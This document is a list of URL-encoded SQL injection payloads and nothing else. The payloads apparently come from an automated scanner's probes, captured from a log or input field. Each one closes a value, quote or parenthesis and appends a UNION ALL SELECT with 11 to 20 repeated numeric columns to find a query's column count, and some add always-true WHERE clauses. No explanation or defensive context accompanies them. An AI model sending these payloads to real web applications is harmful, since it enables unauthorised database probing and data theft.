-8371%29%29%20UNION%20ALL%20SELECT%208727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%2C8727%23 -6152%29%29%20UNION%20ALL%20SELECT%209427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%23 -7636%29%29%29%20UNION%20ALL%20SELECT%209363%2C9363%2C9363%2C9363%2C9363%2C9363%2C9363%2C9363%2C9363%2C9363%2C9363%23 -1577%29%29%29%20UNION%20ALL%20SELECT%201200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%2C1200%23 -3533%29%29%29%20UNION%20ALL%20SELECT%205479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%2C5479%23 -9343%29%29%29%20UNION%20ALL%20SELECT%201088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%23 -6328%29%29%29%20UNION%20ALL%20SELECT%204138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%23 -7977%29%29%29%20UNION%20ALL%20SELECT%205435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%2C5435%23 -8655%29%29%29%20UNION%20ALL%20SELECT%209094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%23 -3743%29%29%29%20UNION%20ALL%20SELECT%202956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%2C2956%23 -1632%29%29%29%20UNION%20ALL%20SELECT%201621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%23 -9112%29%29%29%20UNION%20ALL%20SELECT%201058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%23 -8828%20UNION%20ALL%20SELECT%205952%2C5952%2C5952%2C5952%2C5952%2C5952%2C5952%2C5952%2C5952%2C5952%2C5952%23 -9092%20UNION%20ALL%20SELECT%204231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%23 -7345%20UNION%20ALL%20SELECT%201811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%2C1811%23 -7664%20UNION%20ALL%20SELECT%204804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%2C4804%23 -3196%20UNION%20ALL%20SELECT%201445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%23 -4039%20UNION%20ALL%20SELECT%202494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%23 -3469%20UNION%20ALL%20SELECT%206240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%2C6240%23 -4356%20UNION%20ALL%20SELECT%207211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%23 -8051%20UNION%20ALL%20SELECT%205946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%2C5946%23 -3075%20UNION%20ALL%20SELECT%204671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%23 -8617%29%20WHERE%203284%3D3284%20UNION%20ALL%20SELECT%203284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%23 -6531%29%20WHERE%201713%3D1713%20UNION%20ALL%20SELECT%201713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%23 -8410%29%20WHERE%202309%3D2309%20UNION%20ALL%20SELECT%202309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%2C2309%23 -4621%29%20WHERE%205185%3D5185%20UNION%20ALL%20SELECT%205185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%23 -2133%29%20WHERE%201183%3D1183%20UNION%20ALL%20SELECT%201183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%23 -7332%29%20WHERE%205217%3D5217%20UNION%20ALL%20SELECT%205217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%2C5217%23 -9754%29%20WHERE%206136%3D6136%20UNION%20ALL%20SELECT%206136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%23 -2139%29%20WHERE%207383%3D7383%20UNION%20ALL%20SELECT%207383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%2C7383%23 -3584%29%20WHERE%205171%3D5171%20UNION%20ALL%20SELECT%205171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%23 -3937%29%20WHERE%202541%3D2541%20UNION%20ALL%20SELECT%202541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%2C2541%23 -6399%20WHERE%204096%3D4096%20UNION%20ALL%20SELECT%204096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%23 -4854%20WHERE%201465%3D1465%20UNION%20ALL%20SELECT%201465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%23 -8589%20WHERE%204040%3D4040%20UNION%20ALL%20SELECT%204040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%23 -5908%20WHERE%206113%3D6113%20UNION%20ALL%20SELECT%206113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%23 -5987%20WHERE%202087%3D2087%20UNION%20ALL%20SELECT%202087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%2C2087%23 -9868%20WHERE%207989%3D7989%20UNION%20ALL%20SELECT%207989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%23 -3638%20WHERE%201053%3D1053%20UNION%20ALL%20SELECT%201053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%2C1053%23 -8903%20WHERE%203554%3D3554%20UNION%20ALL%20SELECT%203554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%23 -7388%20WHERE%209563%3D9563%20UNION%20ALL%20SELECT%209563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%23 -7404%20WHERE%205284%3D5284%20UNION%20ALL%20SELECT%205284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%2C5284%23 -1790%27%29%20UNION%20ALL%20SELECT%202205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%23 -8979%27%29%20UNION%20ALL%20SELECT%204472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%2C4472%23 -8452%27%29%20UNION%20ALL%20SELECT%208560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%23 -6828%27%29%20UNION%20ALL%20SELECT%206928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%23 -7118%27%29%20UNION%20ALL%20SELECT%201386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%2C1386%23 -5502%27%29%20UNION%20ALL%20SELECT%202791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%23 -4905%27%29%20UNION%20ALL%20SELECT%204822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%23 -2209%27%29%20UNION%20ALL%20SELECT%204084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%2C4084%23 -4593%27%29%20UNION%20ALL%20SELECT%207674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%23 -7668%27%29%20UNION%20ALL%20SELECT%202978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%23 -2243%27%20UNION%20ALL%20SELECT%206776%2C6776%2C6776%2C6776%2C6776%2C6776%2C6776%2C6776%2C6776%2C6776%2C6776%23 -9518%27%20UNION%20ALL%20SELECT%202004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%2C2004%23 -1064%27%20UNION%20ALL%20SELECT%204962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%23 -5852%27%20UNION%20ALL%20SELECT%206943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%23 -3788%27%20UNION%20ALL%20SELECT%203091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%2C3091%23 -2349%27%20UNION%20ALL%20SELECT%204479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%2C4479%23 -6492%27%20UNION%20ALL%20SELECT%202668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%23 -8879%27%20UNION%20ALL%20SELECT%209258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%23 -8331%27%20UNION%20ALL%20SELECT%201608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%23 -5274%27%20UNION%20ALL%20SELECT%206418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%23 -7826%22%20UNION%20ALL%20SELECT%204459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%23 -5863%22%20UNION%20ALL%20SELECT%206211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%23 -8912%22%20UNION%20ALL%20SELECT%206978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%2C6978%23 -6274%22%20UNION%20ALL%20SELECT%204539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%23 -5150%22%20UNION%20ALL%20SELECT%209585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%2C9585%23 -3574%22%20UNION%20ALL%20SELECT%208256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%23 -4110%22%20UNION%20ALL%20SELECT%203522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%23 -4851%22%20UNION%20ALL%20SELECT%203921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%23 -2293%22%20UNION%20ALL%20SELECT%205316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%23 -5196%22%20UNION%20ALL%20SELECT%209865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%23 -4647%27%29%20UNION%20ALL%20SELECT%204895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%23 -5602%27%29%20UNION%20ALL%20SELECT%204878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%2C4878%23 -5809%27%29%20UNION%20ALL%20SELECT%203365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%23 -6849%27%29%20UNION%20ALL%20SELECT%203980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%2C3980%23 -4277%27%29%20UNION%20ALL%20SELECT%203296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%2C3296%23 -2155%27%29%20UNION%20ALL%20SELECT%201265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%23 -6185%27%29%20UNION%20ALL%20SELECT%204909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%23 -3818%27%29%20UNION%20ALL%20SELECT%205745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%23 -2133%27%29%20UNION%20ALL%20SELECT%208608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%23 -5147%27%29%20UNION%20ALL%20SELECT%206404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%23 -4509%27%29%29%20UNION%20ALL%20SELECT%203672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%23 -3990%27%29%29%20UNION%20ALL%20SELECT%202499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%2C2499%23 -2350%27%29%29%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%23 -6960%27%29%29%20UNION%20ALL%20SELECT%208726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%23 -7017%27%29%29%20UNION%20ALL%20SELECT%202636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%23 -6922%27%29%29%20UNION%20ALL%20SELECT%202596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%2C2596%23 -2397%27%29%29%20UNION%20ALL%20SELECT%202365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%23 -9192%27%29%29%20UNION%20ALL%20SELECT%209612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%23 -2967%27%29%29%20UNION%20ALL%20SELECT%207072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%2C7072%23 -2112%27%29%29%20UNION%20ALL%20SELECT%204562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%23 -3476%27%29%29%29%20UNION%20ALL%20SELECT%206653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%23 -9526%27%29%29%29%20UNION%20ALL%20SELECT%208192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%2C8192%23 -4784%27%29%29%29%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%23 -1051%27%29%29%29%20UNION%20ALL%20SELECT%202443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%23 -5224%27%29%29%29%20UNION%20ALL%20SELECT%209841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%23 -1219%27%29%29%29%20UNION%20ALL%20SELECT%209684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%2C9684%23 -8962%27%29%29%29%20UNION%20ALL%20SELECT%203968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%23 -1492%27%29%29%29%20UNION%20ALL%20SELECT%209541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%23 -8762%27%29%29%29%20UNION%20ALL%20SELECT%202613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%23 -9617%27%29%29%29%20UNION%20ALL%20SELECT%202244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%2C2244%23 -2649%27%20UNION%20ALL%20SELECT%204090%2C4090%2C4090%2C4090%2C4090%2C4090%2C4090%2C4090%2C4090%2C4090%2C4090%23 -5414%27%20UNION%20ALL%20SELECT%201143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%2C1143%23 -5312%27%20UNION%20ALL%20SELECT%204924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%2C4924%23 -1307%27%20UNION%20ALL%20SELECT%203671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%2C3671%23 -1820%27%20UNION%20ALL%20SELECT%208072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%23 -9901%27%20UNION%20ALL%20SELECT%203252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%23 -1828%27%20UNION%20ALL%20SELECT%209994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%2C9994%23 -3728%27%20UNION%20ALL%20SELECT%208965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%23 -2789%27%20UNION%20ALL%20SELECT%203463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%23 -6195%27%20UNION%20ALL%20SELECT%206787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%2C6787%23 -4369%27%29%20UNION%20ALL%20SELECT%203863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%23 -2174%27%29%20UNION%20ALL%20SELECT%202008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%23 -9652%27%29%20UNION%20ALL%20SELECT%206514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%23 -3752%27%29%20UNION%20ALL%20SELECT%204454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%2C4454%23 -2824%27%29%20UNION%20ALL%20SELECT%205145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%2C5145%23 -1840%27%29%20UNION%20ALL%20SELECT%202603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%23 -1985%27%29%20UNION%20ALL%20SELECT%201061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%23 -5688%27%29%20UNION%20ALL%20SELECT%204039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%2C4039%23 -9366%27%29%20UNION%20ALL%20SELECT%204083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%23 -3904%27%29%20UNION%20ALL%20SELECT%208308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%23 -9648%27%29%29%20UNION%20ALL%20SELECT%201846%2C1846%2C1846%2C1846%2C1846%2C1846%2C1846%2C1846%2C1846%2C1846%2C1846%23 -2698%27%29%29%20UNION%20ALL%20SELECT%206344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%23 -7259%27%29%29%20UNION%20ALL%20SELECT%209053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%23 -8226%27%29%29%20UNION%20ALL%20SELECT%201344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%23 -6005%27%29%29%20UNION%20ALL%20SELECT%209999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%23 -7576%27%29%29%20UNION%20ALL%20SELECT%205650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%23 -7789%27%29%29%20UNION%20ALL%20SELECT%205862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%2C5862%23 -5738%27%29%29%20UNION%20ALL%20SELECT%205829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%23 -6216%27%29%29%20UNION%20ALL%20SELECT%208807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%2C8807%23 -2466%27%29%29%20UNION%20ALL%20SELECT%202679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%23 -6619%27%29%29%29%20UNION%20ALL%20SELECT%202010%2C2010%2C2010%2C2010%2C2010%2C2010%2C2010%2C2010%2C2010%2C2010%2C2010%23 -6331%27%29%29%29%20UNION%20ALL%20SELECT%204900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%2C4900%23 -6679%27%29%29%29%20UNION%20ALL%20SELECT%202700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%2C2700%23 -6563%27%29%29%29%20UNION%20ALL%20SELECT%203722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%2C3722%23 -6896%27%29%29%29%20UNION%20ALL%20SELECT%205210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%23 -6327%27%29%29%29%20UNION%20ALL%20SELECT%203606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%23 -2840%27%29%29%29%20UNION%20ALL%20SELECT%201518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%23 -1453%27%29%29%29%20UNION%20ALL%20SELECT%201999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%23 -5787%27%29%29%29%20UNION%20ALL%20SELECT%202223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%23 -8104%27%29%29%29%20UNION%20ALL%20SELECT%209134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%2C9134%23 -5856%27%20UNION%20ALL%20SELECT%206052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%23 -8534%27%20UNION%20ALL%20SELECT%205953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%23 -3563%27%20UNION%20ALL%20SELECT%208891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%23 